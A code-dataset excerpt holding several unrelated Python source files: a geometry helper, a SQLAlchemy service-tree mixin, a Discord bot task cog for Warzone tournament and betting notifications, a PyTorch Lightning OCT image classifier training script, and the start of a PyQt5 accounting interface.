(x0, y0) , (x1, y1) = initialPos, endPos\n\n dx = abs(x1 - x0)\n dy = abs(y0 - y1)\n\n if dx > dy:\n if y0 > y1:\n y1 = y0 - dx\n else:\n y1 = y0 + dx\n else:\n if x0 > x1:\n x1 = x0 - dy\n else:\n x1 = x0 + dy\n return (x0, y0), (x1, y1)\n\n\ndef biggerSmaller(x, y):\n if x > y:\n bigger = x\n smaller = y\n else:\n bigger = y\n smaller = x\n return bigger, smaller\n\ndef drawSquare(initialPos, endPos):\n (x0, y0) , (x1, y1) = getSquare(initialPos, endPos)\n \n for pixel in rectangle.drawRectangle((x0, y0), (x1, y1)):\n yield pixel\n\ndef special():\n return False","sub_path":"trabalho 1/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"231271819","text":"# -*- coding:utf-8 -*-\n#\n# Copyright @ 2019 OPS Inc.\n#\n# Author: Jinlong Yang\n#\n\nfrom sqlalchemy import text\nfrom oslo_log import log as logging\nfrom osmo.db import get_session, model_query\n\nfrom stree.db.model import (\n Tpl,\n Node,\n Instance,\n Key,\n Val\n)\n\nLOG = logging.getLogger(__name__)\n\n\nclass STreeOperMixin(object):\n\n def add_node(self, username, data):\n leaf = data.get('leaf')\n pnode = data.get('pnode')\n new_node = data.get('new_node')\n new_node_path = '%s.%s' % (pnode, new_node)\n self._add(username, new_node, new_node_path, leaf, data)\n\n # NOTE(owt层级, 需自动添加backpool)\n if len(new_node_path.split('.')) == 3 and int(leaf) == 0:\n backpool_path = '%s.backpool' % new_node_path\n print (backpool_path)\n self._add(username, 'backpool', backpool_path, 1, data)\n\n def _add(self, username, name, new_node_path, leaf, data):\n tpl = data.get('tpl')\n session = get_session()\n with session.begin(subtransactions=True):\n node = session.query(Node)\\\n .filter(Node.name == new_node_path)\\\n .first()\n if not node:\n tpl_obj = session.query(Tpl)\\\n .filter(Tpl.alias == tpl)\\\n .first()\n node = Node()\n node.name = name\n node.tpl_id = tpl_obj.id\n node.leaf = int(leaf)\n node.node = new_node_path\n node.op = data.get('rd')\n node.rd = data.get('op')\n session.add(node)\n LOG.info('** user: %s add new node: %s success.'\n % (username, new_node_path))\n\n def del_node(self, username, data):\n node = data.get('node')\n session = get_session()\n with session.begin(subtransactions=True):\n sql = text('select * from tb_node where node <@ :node')\n r = session.execute(sql, {'node': node})\n print (r)\n for row in r:\n print (row)\n\n def ren_node(self, username, data):\n pass\n\n def add_instance(self, username, data):\n node = data.get('node')\n ips = data.get('ips')\n ip_list = ips.split('\\n')\n session = get_session()\n with session.begin(subtransactions=True):\n instance_list = []\n node_obj = session.query(Node)\\\n .filter(Node.node == node)\\\n .first()\n for ip in ip_list:\n instance = Instance()\n instance.node_id = node_obj.id\n instance.ip = ip\n instance.hostname = 'l-pad.ops.cn9'\n instance_list.append(instance)\n session.add_all(instance_list)\n\n\nclass STreeDataMixin(object):\n\n def query_tree(self):\n # TODO: 根据用户有权限节点查询\n tree_list = []\n node_list = model_query(Node).all()\n for model in node_list:\n data = {}\n node = model.node\n section_list = node.rsplit('.', 1)\n if len(section_list) == 1:\n root = node\n data['id'] = root\n data['pid'] = root\n data['name'] = root\n data['open'] = True\n data['isParent'] = 0 if model.leaf else 1\n tree_list.append(data)\n continue\n pid = section_list[0]\n name = section_list[1]\n data['id'] = node\n data['pid'] = pid\n data['name'] = name\n data['isParent'] = 0 if model.leaf else 1\n tree_list.append(data)\n expand_node = min(tree_list,\n key=lambda arg: len(arg.get('id'))).get('id')\n return {\n 'tree_list': tree_list,\n 'expand_node': expand_node\n }\n\n def query_tpl(self):\n tpl_list = model_query(Tpl).all()\n return list(map(lambda m: m.alias, tpl_list))\n\n def query_instance(self, username, data):\n result_list = []\n node = data.get('node')\n offset = data.get('offset')\n session = get_session()\n instances = session.query(Instance).join(Node)\\\n .filter(Node.node == node)\\\n .order_by(Instance.id)\\\n .limit(10)\\\n .offset(offset)\\\n .all()\n for model in instances:\n hostinfo = {\n 'ip': model.ip,\n 'hostname': model.hostname,\n 'status': model.active,\n 'deploy': '',\n 'crontab': '',\n 'operation': ''\n }\n for item in model.vals:\n if model.id == item.instance_id:\n hostinfo.update({\n item.key.key: item.value\n })\n break\n result_list.append(hostinfo)\n count = session.query(Instance).join(Node)\\\n .filter(Node.node == node)\\\n .count()\n return {\n 'instances': result_list,\n 'total': count\n }\n\n def query_node_info(self, username, data):\n node = data.get('node')\n session = get_session()\n node_obj = session.query(Node)\\\n .filter(Node.node == node)\\\n .first()\n return {\n 'op': node_obj.op,\n 'rd': node_obj.rd,\n 'tpl': node_obj.tpl.alias\n }\n","sub_path":"stree/fe/bll/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"505993723","text":"import discord\nfrom wlct.models import Clan, Player, DiscordUser, DiscordChannelClanFilter, DiscordChannelPlayerFilter, DiscordChannelTournamentLink, DiscordTournamentUpdate\nfrom wlct.tournaments import Tournament, TournamentTeam, TournamentGame, TournamentPlayer, MonthlyTemplateRotation, get_games_finished_for_team_since, find_tournament_by_id, get_team_data_no_clan, RealTimeLadder, get_real_time_ladder, TournamentGame, ClanLeagueTournament, get_multi_day_ladder, TournamentGameEntry, TournamentRound, get_team_data_no_clan_player_list\nfrom discord.ext import commands, tasks\nfrom django.utils import timezone\nfrom traceback import print_exc\nfrom wlct.logging import log_exception, log, LogLevel, Logger, log_bot_msg, log_cb_msg\nfrom wlct.api import API\nimport gc\nimport datetime\nimport pytz\nimport urllib.request\nimport json\nfrom wlct.clotbook import DiscordChannelCLOTBookLink, get_clotbook, BetGameOdds, BetTeamOdds, Bet\nfrom channels.db import database_sync_to_async\nimport gc\nimport asyncio\n\nclass Tasks(commands.Cog, name=\"tasks\"):\n def __init__(self, bot):\n self.bot = bot\n self.last_task_run = timezone.now()\n self.executions = 0\n self.bg_task.start()\n self.orm_helpers = DjangoORMHelpers()\n\n async def handle_rtl_tasks(self):\n ladders = RealTimeLadder.objects.all()\n for ladder in ladders:\n games = self.orm_helpers.get_rtl_games(ladder)\n # cache the game data + link for use with the embed\n emb = discord.Embed(color=self.bot.embed_color)\n emb.set_author(icon_url=self.bot.user.avatar_url, name=\"WarzoneBot\")\n emb.title = \"New Ladder Game Created\"\n emb.set_footer(text=\"Bot created and maintained by -B#0292\")\n for game in games:\n data = \"\"\n team1 = game.teams.split('.')[0]\n team2 = game.teams.split('.')[1]\n player1 = ladder.get_player_from_teamid(team1)\n player2 = ladder.get_player_from_teamid(team2)\n if player1.discord_member and player2.discord_member:\n data += \"<@{}> vs. <@{}> [Game Link]({})\\n\".format(player1.discord_member.memberid, player2.discord_member.memberid,\n game.game_link)\n elif player1.discord_member:\n data += \"<@{}> vs. <{}> [Game Link]({})\\n\".format(player1.discord_member.memberid, player2.name,\n game.game_link)\n elif player2.discord_member:\n data += \"<{}> vs. <@{}> [Game Link]({})\\n\".format(player1.name, player2.discord_member.memberid,\n game.game_link)\n else:\n game.mentioned = True\n game.save()\n return\n emb.add_field(name=\"Game\", value=data, inline=True)\n if player1 and player1.discord_member:\n user = self.bot.get_user(player1.discord_member.memberid)\n if user:\n try:\n await user.send(embed=emb)\n except:\n log_bot_msg(\"Could not send RTL game msg to {} \".format(player1.name))\n if player2 and player2.discord_member:\n user = self.bot.get_user(player2.discord_member.memberid)\n if user:\n try:\n await user.send(embed=emb)\n except:\n log_bot_msg(\"Could not send RTL game msg to {} \".format(player2.name))\n game.mentioned = True\n game.save()\n\n async def handle_clan_league_next_game(self):\n clt = ClanLeagueTournament.objects.filter(is_finished=False)\n for t in clt:\n # get the time until next game allocation\n start_times = t.games_start_times.split(';')\n\n # always take the next (first) one\n if len(start_times[0]) >= 8: # every start time is a day/month/year, and we need at least 8 characters\n next_start = datetime.datetime.strptime(start_times[0], \"%m.%d.%y\")\n diff = datetime.datetime.utcnow() - next_start\n # diff is our delta, compute how many days, hours, minutes remaining\n\n async def handle_clotbook(self):\n channel_links = DiscordChannelCLOTBookLink.objects.filter(results_only=False)\n odds_created_sent = []\n odds_finished_sent = []\n cb = get_clotbook()\n try:\n for cl in channel_links:\n channel = self.bot.get_channel(cl.channelid)\n if hasattr(self.bot, 'uptime') and channel:\n bet_odds = BetGameOdds.objects.filter(sent_created_notification=False, initial=True).order_by('created_time')\n for bo in bet_odds:\n if not cl.does_game_pass_filter(bo.game):\n odds_created_sent.append(bo)\n continue\n emb = self.bot.get_default_embed()\n emb = cb.get_initial_bet_card(bo, emb)\n await channel.send(embed=emb)\n odds_created_sent.append(bo)\n\n channel_links = DiscordChannelCLOTBookLink.objects.filter(results_only=True)\n for cl in channel_links:\n channel = self.bot.get_channel(cl.channelid)\n if hasattr(self.bot, 'uptime') and channel:\n bet_odds = BetGameOdds.objects.filter(sent_finished_notification=False, game__is_finished=True)\n print(\"Found {} finished bet game odds\".format(bet_odds.count()))\n for bo in bet_odds:\n if bo.game.winning_team:\n if not cl.does_game_pass_filter(bo.game):\n odds_finished_sent.append(bo)\n continue\n emb = self.bot.get_default_embed()\n emb = cb.get_bet_results_card(bo, emb)\n if emb:\n await channel.send(embed=emb)\n odds_finished_sent.append(bo)\n except Exception:\n log_exception()\n finally:\n for odds in odds_created_sent:\n odds.sent_created_notification = True\n odds.save()\n for odds in odds_finished_sent:\n odds.sent_finished_notification = True\n odds.save()\n\n async def handle_game_logs(self):\n channel_links = DiscordChannelTournamentLink.objects.all()\n games_sent = []\n try:\n for cl in channel_links:\n channel = self.bot.get_channel(cl.channelid)\n # for each channel, see if there are any new games that have finished in the tournament that's linked\n # only look at games that have finished times greater than when the bot started\n game_log_text = \"\"\n if hasattr(self.bot, 'uptime') and channel:\n games = self.orm_helpers.get_game_logs_for_tournament(cl.tournament, self.bot.uptime-datetime.timedelta(days=3))\n if len(games) > 0:\n log_bot_msg(\"Found {} games to log in channel {}\".format(len(games), channel.name))\n for game in games:\n if game.game_finished_time is None and game.winning_team or not game.winning_team:\n continue # ignore games with no finished time (which might be 0 and returned in this query)\n # we have the game, construct the log text and send it to the channel\n\n # Check if game passes player/clan filter\n if not cl.does_game_pass_filter(game):\n games_sent.append(game)\n continue\n\n # bold the clans if any, and italicize\n teams = game.teams.split('.')\n team_list = []\n team_list.append(game.winning_team.id)\n for team in teams:\n if int(team) not in team_list:\n team_list.append(int(team))\n\n player_team_id_list = None\n if game.players:\n player_team_id_list = game.players.split(\"-\")\n\n wrote_defeats = False\n for team in team_list:\n tt = TournamentTeam.objects.filter(pk=team)\n if tt:\n tt = tt[0]\n # look up the clan for this team, and bold/write the clan name in there.\n if tt.clan_league_clan and tt.clan_league_clan.clan:\n game_log_text += \"**{}** \".format(tt.clan_league_clan.clan.name)\n\n # if game has 'players' value, use that otherwise get names from TournamentPlayer\n if player_team_id_list:\n tplayers = player_team_id_list[teams.index(str(team))].split(\".\")\n else:\n tplayers = TournamentPlayer.objects.filter(team=tt)\n\n for tplayer in tplayers:\n if player_team_id_list:\n player_name = Player.objects.filter(token=tplayer)\n player_name = player_name[0].name\n else:\n player_name = tplayer.player.name\n game_log_text += \"*{}*, \".format(player_name)\n\n game_log_text = game_log_text[:-2]\n if not wrote_defeats:\n game_log_text += \" defeats \"\n wrote_defeats = True\n\n tournament = find_tournament_by_id(game.tournament.id, True)\n if tournament and hasattr(tournament, 'clan_league_template') and tournament.clan_league_template:\n game_log_text += \"\\n{}\".format(tournament.clan_league_template.name)\n\n game_log_text += \"\\n<{}>\".format(game.game_link)\n\n log_bot_msg(\"Looping through channels to log: {}, length: {}\".format(game_log_text, len(game_log_text)))\n if channel and len(game_log_text) > 0:\n log_bot_msg(\"Sending game_log to channel: {}\".format(channel.name))\n try:\n await channel.send(game_log_text)\n games_sent.append(game)\n game_log_text = \"\"\n except:\n log_bot_msg(\"Exception: {} when sending message to server {}, channel {}\".format(log_exception(), channel.guild.name, channel.name))\n\n except Exception:\n log_exception()\n finally:\n for g in games_sent:\n g.game_log_sent = True\n g.save()\n\n async def handle_server_stats(self):\n pass\n\n async def handle_hours6_tasks(self):\n #await self.handle_clan_league_next_game()\n pass\n\n async def handle_hours4_tasks(self):\n # every 4 hours we currently only send clan league updates\n pass\n\n async def handle_hours_tasks(self):\n pass\n\n async def handle_day_tasks(self):\n await self.handle_server_stats()\n\n async def handle_no_winning_team_games(self):\n games = TournamentGame.objects.filter(winning_team__isnull=True, is_finished=True, no_winning_team_log_sent=False)\n msg = \"\"\n if games:\n msg += \"**Games finished with no winning team found**\"\n for game in games:\n for cc in self.bot.critical_error_channels:\n msg += \"\\n{} | ID: {} \\nLink: <{}> \\nLogs: \".format(game.tournament.name, game.gameid, game.game_link, game.gameid)\n msg = msg[:1999]\n await cc.send(msg)\n game.no_winning_team_log_sent = True\n game.save()\n msg = \"\"\n\n async def handle_rt_ladder(self):\n tournaments = Tournament.objects.filter(has_started=True, is_finished=False)\n for tournament in tournaments:\n child_tournament = find_tournament_by_id(tournament.id, True)\n if child_tournament and not child_tournament.should_process_in_engine():\n try:\n child_tournament.update_in_progress = True\n child_tournament.save()\n games = TournamentGame.objects.filter(is_finished=False, tournament=tournament)\n for game in games.iterator():\n # process the game\n # query the game status\n child_tournament.process_game(game)\n # in case tournaments get stalled for some reason\n # for it to process new games based on current tournament data\n child_tournament.process_new_games()\n await self.handle_rtl_tasks()\n except Exception as e:\n log_exception()\n finally:\n child_tournament.update_in_progress = False\n child_tournament.save()\n gc.collect()\n\n async def handle_process_queue(self):\n for i in range(0, len(self.bot.process_queue)):\n gc.collect()\n t = find_tournament_by_id(self.bot.process_queue[i], True)\n if t:\n print(\"Processing data for {}\".format(t.name))\n games = TournamentGame.objects.filter(is_finished=False, tournament=t)\n for game in games.iterator():\n # process the game\n # query the game status\n t.process_game(game)\n gc.collect()\n t.process_new_games()\n self.bot.process_queue.pop(i)\n\n async def handle_cache_queue(self):\n for i in range(0, len(self.bot.cache_queue)):\n gc.collect()\n t = find_tournament_by_id(self.bot.cache_queue[i], True)\n if t:\n print(\"Caching data for {}\".format(t.name))\n t.cache_data()\n self.bot.cache_queue.pop(i)\n\n async def handle_critical_errors(self):\n logs = self.orm_helpers.get_critical_errors()\n if logs:\n for log in logs:\n for cc in self.bot.critical_error_channels:\n msg = \"**Critical Log Found**\\n\"\n msg += log.msg\n msg = msg[:1999]\n await cc.send(msg)\n await asyncio.sleep(1)\n log.bot_seen = True\n log.save()\n\n async def handle_discord_tournament_updates(self):\n try:\n updates = self.orm_helpers.get_tournament_updates()\n for u in updates:\n # look up the tournament, and get all channel links for that tournament\n channel_links = self.orm_helpers.get_channel_tournament_links(u.tournament)\n for c in channel_links:\n channel = self.bot.get_channel(c.channelid)\n if channel:\n await channel.send(u.update_text)\n u.bot_send = True\n u.save()\n except:\n log_exception()\n\n async def handle_all_tasks(self):\n # calculate the time different here\n # determine if we need hours run or 4 hours run\n # for 1 hour, executions should be 360\n start = datetime.datetime.utcnow()\n hours = (self.executions % 360 == 0)\n hours4 = (self.executions % (360*4) == 0)\n hours6 = (self.executions % (360*6) == 0)\n day = (self.executions % (360*24) == 0)\n two_minute = (self.executions % 12 == 0)\n\n try:\n if hours:\n await self.handle_hours_tasks()\n if hours4:\n await self.handle_hours4_tasks()\n if hours6:\n await self.handle_hours6_tasks()\n if day:\n await self.handle_day_tasks()\n if two_minute:\n start = datetime.datetime.utcnow()\n await self.handle_rt_ladder()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"RT Ladder Tasks took {} total seconds\".format((end-start).total_seconds()))\n\n # always tasks\n start = datetime.datetime.utcnow()\n await self.handle_always_tasks()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"Always Tasks took {} total seconds\".format((end-start).total_seconds()))\n except Exception:\n log_exception()\n finally:\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"All Tasks took {} total seconds\".format((end-start).total_seconds()))\n gc.collect()\n\n async def handle_always_tasks(self):\n start = datetime.datetime.utcnow()\n await self.handle_critical_errors()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"Critical Errors Tasks took {} total seconds\".format((end-start).total_seconds()))\n start = datetime.datetime.utcnow()\n await self.handle_game_logs()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"Game Logs Tasks took {} total seconds\".format((end-start).total_seconds()))\n start = datetime.datetime.utcnow()\n await self.handle_cache_queue()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"Cache queue took {} total seconds\".format((end-start).total_seconds()))\n start = datetime.datetime.utcnow()\n await self.handle_process_queue()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"Process queue took {} total seconds\".format((end-start).total_seconds()))\n start = datetime.datetime.utcnow()\n await self.handle_discord_tournament_updates()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"Tournament updates Tasks took {} total seconds\".format((end-start).total_seconds()))\n start = datetime.datetime.utcnow()\n await self.handle_clotbook()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"CLOTBook Tasks took {} total seconds\".format((end-start).total_seconds()))\n\n async def process_member_join(self, memid):\n member = self.bot.get_user(memid)\n if member:\n send_message = False\n discord_user = DiscordUser.objects.filter(memberid=memid)\n emb = discord.Embed(color=self.bot.embed_color)\n emb.set_author(icon_url=self.bot.user.avatar_url, name=\"WarzoneBot\")\n emb.title = \"It's nice to meet you!\"\n emb.set_footer(text=\"Bot created and maintained by -B#0292\")\n msg = \"Hello {},\\n\\nI'm a homemade Warzone Discord Bot. \\n\\nI'm reaching out because your discord account\".format(\n member.name)\n msg += \" is not linked to the CLOT (custom ladder or tournament). Please see http://wzclot.eastus.cloudapp.azure.com/me/ for instructions\"\n msg += \" on how to link the two accounts together.\\n\\nThis will allow you to participate in the bot's\"\n msg += \" new real-time-ladder, as well as help to become verified in the Warzone discord server.\"\n emb.add_field(name=\"Welcome\", value=msg)\n\n if not discord_user:\n discord_user = DiscordUser(memberid=memid)\n discord_user.save()\n else:\n discord_user = discord_user[0]\n\n if not discord_user.link_mention:\n print(\"Sending welcome message to {}\".format(member.name))\n await member.send(embed=emb)\n discord_user.link_mention = True\n discord_user.save()\n\n @tasks.loop(seconds=10.0)\n async def bg_task(self):\n # runs every 10 seconds to check various things\n # are there any new games on the RTL that just got allocated?\n try:\n await self.bot.wait_until_ready()\n owner = self.bot.owner\n await self.handle_all_tasks()\n self.last_task_run = timezone.now()\n self.executions += 1\n except:\n print_exc()\n raise\n\nclass DjangoORMHelpers():\n\n def get_critical_errors(self):\n return list(Logger.objects.filter(level=LogLevel.critical, bot_seen=False))\n\n def get_tournament_updates(self):\n return list(DiscordTournamentUpdate.objects.filter(bot_send=False))\n\n def get_channel_tournament_links(self, tournament):\n return list(DiscordChannelTournamentLink.objects.filter(tournament=tournament))\n\n def get_rtl_games(self, ladder):\n return list(TournamentGame.objects.filter(tournament=ladder, is_finished=False, mentioned=False))\n\n def get_game_logs_for_tournament(self, tournament, time_since):\n return list(TournamentGame.objects.filter(is_finished=True, tournament=tournament, game_finished_time__gt=(time_since), game_log_sent=False))\n\ndef setup(bot):\n bot.add_cog(Tasks(bot))","sub_path":"wlct/cogs/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":21928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"605814455","text":"gpus = \"0,1\"\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = gpus\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport cv2\nimport glob\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nfrom sklearn.metrics import accuracy_score, cohen_kappa_score\nfrom sklearn.model_selection import StratifiedKFold, GroupKFold\n\nimport timm\nimport torch\nimport torch.nn as nn\nimport albumentations as A\nimport pytorch_lightning as pl\nfrom albumentations.pytorch import ToTensorV2\nfrom torch.utils.data import Dataset, DataLoader\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom utils.loss.smooth import LabelSmoothingLoss\nfrom utils.mixup import mixup_data, mixup_criterion\npl.seed_everything(0)\n\n\nclass Model(pl.LightningModule):\n def __init__(self, **args):\n super(Model, self).__init__()\n for k, v in args.items():\n setattr(self, k, v)\n self.args = args\n self.model = timm.create_model(self.model_name, pretrained = True, in_chans = 1, num_classes = self.num_classes, drop_rate = self.drop_rate)\n self.criterion = LabelSmoothingLoss(classes = self.num_classes, smoothing = self.smoothing)\n self.save_hyperparameters()\n\n class Data(Dataset):\n def __init__(self, df, trans, **args):\n self.df = df\n self.trans = trans\n for k, v in args.items():\n setattr(self, k, v)\n \n def __getitem__(self, idx):\n image = np.array(Image.open(self.df.loc[idx, \"oct_file\"]))\n label = np.array(self.df.loc[idx, \"label\"])\n\n if self.trans is not None:\n image = self.trans(image = image)[\"image\"]\n return image, label\n\n def __len__(self):\n return len(self.df)\n\n def prepare_data(self):\n img_files = sorted(glob.glob(\"./data/train/images/*/*_crop.jpg\"))\n oct_files = sorted(glob.glob(\"./data/train/images/*/*/*_crop.png\"))\n\n labels = pd.read_csv(\"./data/train/train.csv\")\n labels[\"label\"] = labels.non + 2 * labels.early + 3 * labels.mid_advanced - 1\n labels[\"uid\"] = labels.pop(\"data\")\n\n df_img = pd.DataFrame({\"img_file\": img_files})\n df_img[\"uid\"] = df_img.img_file.apply(lambda x: int(os.path.basename(os.path.dirname(x))))\n df_oct = pd.DataFrame({\"oct_file\": oct_files})\n df_oct[\"uid\"] = df_oct.oct_file.apply(lambda x: int(os.path.basename(os.path.dirname(x))))\n df_oct = df_oct.iloc[::5]\n\n df = labels.merge(df_img, on = \"uid\", how = \"outer\").merge(df_oct, on = \"uid\", how = \"outer\")\n df = df.reset_index(drop = True)\n\n split = GroupKFold(5)\n train_idx, valid_idx = list(split.split(df, groups = df.uid))[self.fold]\n self.df_train = df.loc[train_idx].reset_index(drop = True) if self.fold != -1 else df.reset_index(drop = True)\n self.df_valid = df.loc[valid_idx].reset_index(drop = True)\n self.ds_train = self.Data(self.df_train, self.trans_train, **self.args)\n self.ds_valid = self.Data(self.df_valid, self.trans_valid, **self.args)\n\n def train_dataloader(self):\n return DataLoader(self.ds_train, self.batch_size, shuffle = True, num_workers = 4)\n\n def val_dataloader(self):\n return DataLoader(self.ds_valid, self.batch_size, num_workers = 4)\n\n def configure_optimizers(self):\n optimizer = torch.optim.AdamW(self.model.parameters(), lr = self.learning_rate, weight_decay = 2e-5)\n lr_scheduler = {'scheduler': torch.optim.lr_scheduler.OneCycleLR(optimizer, max_lr = self.learning_rate, steps_per_epoch = int(len(self.train_dataloader())), epochs = self.num_epochs, anneal_strategy = \"linear\", final_div_factor = 30,), 'name': 'learning_rate', 'interval':'step', 'frequency': 1}\n return [optimizer], [lr_scheduler]\n\n def on_fit_start(self):\n metric_placeholder = {\"valid_metric\": 0}\n self.logger.log_hyperparams(self.hparams, metrics = metric_placeholder)\n\n def forward(self, x):\n yhat = self.model(x)\n return yhat\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n if self.alpha != 0:\n x, ya, yb, lam = mixup_data(x, y, self.alpha)\n yhat = self(x)\n loss = mixup_criterion(self.criterion, yhat, ya, yb, lam)\n else:\n yhat = self(x)\n loss = self.criterion(yhat, y)\n self.log(\"train_loss\", loss)\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n yhat = self(x)\n loss = self.criterion(yhat, y)\n self.log(\"valid_loss\", loss, prog_bar = True)\n return y, yhat\n\n def validation_step_end(self, output):\n return output\n\n def validation_epoch_end(self, outputs):\n y = torch.cat([_[0] for _ in outputs]).detach().cpu().numpy()\n yhat = torch.cat([_[1] for _ in outputs]).argmax(1).detach().cpu().numpy()\n df = self.val_dataloader().dataset.df.iloc[:len(y)]\n df[\"pred\"] = yhat\n y = df.groupby(\"uid\").agg(\"mean\").label.round().astype(int)\n yhat = df.groupby(\"uid\").agg(\"mean\").pred.round().astype(int)\n kap = cohen_kappa_score(y, yhat, weights = \"quadratic\")\n self.log(\"valid_metric\", kap, prog_bar = True)\n\nargs = dict(\n learning_rate = 1e-3,\n model_name = \"tf_efficientnet_b0_ns\",\n num_epochs = 30,\n batch_size = 64,\n fold = 4,\n num_classes = 3,\n smoothing = 0.,\n alpha = 1,\n image_size = 384,\n drop_rate = 0.5,\n swa = False,\n name = \"OCT/b0ns\",\n version = \"v2_0.2\"\n)\nargs['trans_train'] = A.Compose([\n A.Resize(args['image_size'], args['image_size']),\n A.HorizontalFlip(),\n A.VerticalFlip(),\n A.RandomRotate90(),\n A.GridDistortion(),\n A.PiecewiseAffine(),\n A.Normalize([0], [1]),\n ToTensorV2()])\nargs['trans_valid'] = A.Compose([\n A.Resize(args['image_size'], args['image_size']),\n A.Normalize([0], [1]),\n ToTensorV2()])\n\nif __name__ == \"__main__\":\n logger = TensorBoardLogger(\"./logs\", name = args[\"name\"], version = args[\"version\"], default_hp_metric = False)\n callback = pl.callbacks.ModelCheckpoint(\n filename = '{epoch}_{valid_metric:.3f}',\n save_last = True,\n mode = \"max\",\n monitor = 'valid_metric'\n )\n model = Model(**args)\n trainer = pl.Trainer(\n gpus = len(gpus.split(\",\")), \n precision = 16, amp_backend = \"native\", amp_level = \"O1\", \n accelerator = \"dp\",\n gradient_clip_val = 10,\n max_epochs = args[\"num_epochs\"],\n stochastic_weight_avg = args[\"swa\"],\n logger = logger,\n progress_bar_refresh_rate = 10,\n callbacks = [callback]\n )\n trainer.fit(model)","sub_path":"Solver_OCT.py","file_name":"Solver_OCT.py","file_ext":"py","file_size_in_byte":6672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63517781","text":"#-*- coding: utf-8 -*-\r\n\r\n'''\r\nCreated on 19 janv. 2016\r\n\r\n@author: acremieux\r\n'''\r\n\r\n#Imports from the Python library\r\nimport os\r\nimport sys\r\nimport csv\r\nimport time\r\nimport itertools\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets;\r\nimport modelmanager.connect_dic as con_dic;\r\nimport modelmanager.db_manager as mngr;\r\nimport datastream.type_functions as tf;\r\nimport view.table_tree_view as treeView;\r\nimport datastream.glob as glob;\r\nfrom PyQt5.Qt import QStandardItemModel, QVariant, QFileDialog, QDialog\r\nfrom PyQt5.Qt import QMessageBox, QInputDialog\r\nfrom view.query_view_table import QueryViewTable\r\nfrom test.test_binop import isint\r\nimport functools\r\nfrom datastream.glob import chart_account_ext\r\nfrom sys import stdin, stdout\r\n\r\n\r\nclass Ui_iris_main(object):\r\n \r\n def setupUi(self, iris_main, conDic : con_dic.ConnectInfos, table_year, year_dimension):\r\n #Init Central windows\r\n self._main_windows = iris_main;\r\n self._init_windows(iris_main);\r\n self.centralwidget = self._init_central_widget(iris_main);\r\n self.gridLayout = self._init_grid_layout(self.centralwidget);\r\n iris_main.setCentralWidget(self.centralwidget);\r\n \r\n #Central splitter : left for the treeview, right for the tab view\r\n self.mainSplitter = self._init_main_splitter(self.centralwidget);\r\n self.leftLayoutWdg = self._init_left_layout(self.mainSplitter);\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\r\n sizePolicy.setHorizontalStretch(2)\r\n sizePolicy.setVerticalStretch(0)\r\n self.leftLayoutWdg.setSizePolicy(sizePolicy);\r\n self.rightLayoutWdg = self._init_right_layout(self.mainSplitter);\r\n self.gridLayout.addWidget(self.mainSplitter, 0, 0, 1, 1)\r\n self.leftLayoutWdg.raise_()\r\n self.rightLayoutWdg.raise_()\r\n \r\n #Tree view declarations\r\n self.tablesTreeLayout = self._init_tables_tree_layout(self.leftLayoutWdg);\r\n self.tablesTreeView = None;\r\n \r\n #Tab view declarations\r\n self.tabViewLayout = self._init_tab_view_layout(self.rightLayoutWdg);\r\n self.tabWidget = None;\r\n self.queryTabs = [];\r\n self.queryViews = [];\r\n \r\n #Initiate menubar and menubar's menus and menus' actions\r\n self.menubar = QtWidgets.QMenuBar(iris_main)\r\n self.menubar.setGeometry(QtCore.QRect(0, 0, 1024, 21))\r\n self.menubar.setObjectName(\"menubar\")\r\n self.menuFichier = QtWidgets.QMenu(self.menubar)\r\n self.menuFichier.setObjectName(\"menuFichier\")\r\n self.menuYear = QtWidgets.QMenu(self.menubar)\r\n self.menuYear.setObjectName(\"menuYear\")\r\n self.menuRqt = QtWidgets.QMenu(self.menubar)\r\n self.menuRqt.setObjectName(\"menuRqt\")\r\n iris_main.setMenuBar(self.menubar)\r\n \r\n self.showAnalyticsBook = QtWidgets.QAction(iris_main);\r\n self.showAnalyticsBook.setObjectName(\"showAnalyticsBook\");\r\n self.showAnalyticsBook.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Grand livre analytique\",\r\n \"sqlscript/gd_livre_analytique.txt\",\r\n [['Entrez l\\'année : ', 'i']]));\r\n \r\n self.showGeneralEntries = QtWidgets.QAction(iris_main);\r\n self.showGeneralEntries.setObjectName(\"showGeneralEntries\");\r\n self.showGeneralEntries.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Visionner un compte général\",\r\n \"sqlscript/ecriture_compte.txt\",\r\n [['Entrez l\\'année : ', 'i'],\r\n ['Entrez le numéro de compte : ', 'i']]));\r\n \r\n self.showGeneralBook = QtWidgets.QAction(iris_main);\r\n self.showGeneralBook.setObjectName(\"showGeneralBook\");\r\n self.showGeneralBook.triggered.connect(functools.partial(self._query_from_file_dialog,\r\n \"Grand livre general\",\r\n \"sqlscript/gd_livre_general.txt\",\r\n [['Entrez l\\'année : ', 'i']]));\r\n \r\n self.showClientEntries = QtWidgets.QAction(iris_main);\r\n 